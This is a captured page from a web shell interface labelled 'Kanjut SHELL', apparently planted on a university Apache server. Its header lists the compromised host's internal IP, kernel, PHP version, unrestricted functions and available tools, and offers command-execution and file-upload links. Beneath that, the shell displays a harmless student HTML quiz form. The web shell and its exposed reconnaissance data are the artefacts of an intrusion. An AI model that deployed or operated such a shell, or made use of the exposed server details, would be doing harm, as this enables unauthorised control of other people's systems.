Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 13.58.61.197
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/rlbarner/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/rlbarner/www/form4.html
<!--
	Fourth Form
	Radio buttons: first time coding
	Goal: Simulate a web exam by using radio buttons. PHP action page displays the 
results.
	Page 32
-->

<BODY BGCOLOR="#D9D9F3">
<FONT FACE="Sylfaen">
<CENTER>
<TITLE>Notes: Radio Buttons</TITLE>
<H2>
The Fourth Form
</H2>
<HR>

<Form action=action4.php method=post>
Ada is the so-called first programmer.
<INPUT type=radio name=question value=true> True
<INPUT type=radio name=question value=false> False
<BR>
<INPUT type=submit value=Submit>
<INPUT type=reset value=Reset>

</Form>
</CENTER>
</FONT>
</BODY>

Stv3n404 - 2023